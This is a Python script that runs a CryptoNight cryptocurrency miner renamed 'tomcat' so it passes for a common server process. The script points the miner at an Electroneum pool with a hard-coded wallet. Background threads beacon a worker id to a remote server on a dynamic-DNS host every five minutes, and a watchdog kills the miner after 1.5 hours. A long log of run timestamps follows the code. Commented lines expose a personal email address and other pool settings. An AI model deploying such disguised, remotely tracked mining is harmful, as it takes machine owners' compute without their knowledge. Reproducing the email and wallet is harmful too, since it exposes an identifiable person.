import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:03.203492
#2018-02-17 17:33:03.469971
#2018-02-17 19:21:05.619841
#2018-02-17 21:10:06.535158
#2018-02-17 22:54:06.723187
#2018-02-18 00:39:01.446133
#2018-02-18 02:29:05.811252
#2018-02-18 04:16:03.919762
#2018-02-18 06:06:06.052901
#2018-02-18 07:57:06.843016
#2018-02-18 09:45:08.913980
#2018-02-18 11:33:02.035360
#2018-02-18 13:18:06.599982
#2018-02-18 15:08:04.802721
#2018-02-18 16:56:05.372123
#2018-02-18 18:45:01.636207
#2018-02-18 20:31:01.923015
#2018-02-18 22:16:05.520068
#2018-02-19 00:05:05.444313
#2018-02-19 01:51:06.830150
#2018-02-19 03:38:04.231384
#2018-02-19 05:23:01.331188
#2018-02-19 07:11:06.519148
#2018-02-19 08:59:04.633281
#2018-02-19 10:48:10.057122
#2018-02-19 12:37:07.163217
#2018-02-19 14:25:02.116156
#2018-02-19 16:13:04.644895
#2018-02-19 17:59:02.192800
#2018-02-19 19:45:13.114491
#2018-02-19 21:34:07.917830
#2018-02-19 23:20:10.251843
#2018-02-20 01:06:06.520023
#2018-02-20 02:54:01.976522
#2018-02-20 04:41:07.503302
#2018-02-20 06:25:05.704846
#2018-02-20 08:10:01.569138
#2018-02-20 09:55:01.708476
#2018-02-20 11:38:07.818022
#2018-02-20 13:25:09.094737
#2018-02-20 15:11:08.498944
#2018-02-20 16:56:07.233574
#2018-02-20 18:45:13.467805
#2018-02-20 20:39:06.855822
#2018-02-20 22:23:04.824479
#2018-02-21 00:05:08.451611
#2018-02-21 01:51:06.796674
#2018-02-21 03:41:06.977335
#2018-02-21 05:28:06.205460
#2018-02-21 07:16:03.621927
#2018-02-21 09:01:06.714389
#2018-02-21 10:51:03.621032
#2018-02-21 12:38:07.520187
#2018-02-21 14:27:01.482365
#2018-02-21 16:12:13.238116
#2018-02-21 18:03:06.656789
#2018-02-21 19:51:08.403786
#2018-02-21 21:39:06.894791
#2018-02-21 23:25:06.848928
#2018-02-22 01:13:04.607755
#2018-02-22 03:02:07.944030
#2018-02-22 04:47:01.296044
#2018-02-22 06:32:03.596611
#2018-02-22 08:19:04.404070
#2018-02-22 10:08:05.122355
#2018-02-22 11:53:10.132191
#2018-02-22 13:37:01.447226
#2018-02-22 15:25:09.638360
#2018-02-22 17:11:08.938203
#2018-02-22 18:58:06.817072
#2018-02-22 20:51:03.821548
#2018-02-22 22:38:08.094065
#2018-02-23 00:24:06.361671
#2018-02-23 02:12:08.668674
#2018-02-23 04:02:06.602773
#2018-02-23 05:47:07.208023
#2018-02-23 07:37:01.401959
#2018-02-23 09:40:08.912263
#2018-02-23 11:44:01.599863
#2018-02-23 13:35:11.976128
#2018-02-23 15:21:07.071208
#2018-02-23 17:07:08.451634
#2018-02-23 18:38:06.974441
#2018-02-23 20:18:03.814125
#2018-02-23 21:54:01.480548
#2018-02-23 23:29:02.206838
#2018-02-24 01:03:07.096959
#2018-02-24 02:46:01.968659
#2018-02-24 04:24:06.305958
#2018-02-24 06:09:07.354495
#2018-02-24 07:56:05.933291
#2018-02-24 09:41:05.009567
#2018-02-24 11:36:07.607390
#2018-02-24 13:26:06.710648
#2018-02-24 15:15:07.499516
#2018-02-24 17:04:07.181158
#2018-02-24 18:57:01.722481
#2018-02-24 20:44:05.475180
#2018-02-24 22:58:01.250298
#2018-02-25 02:15:06.859838
#2018-02-25 05:51:06.283874
#2018-02-25 11:37:06.839893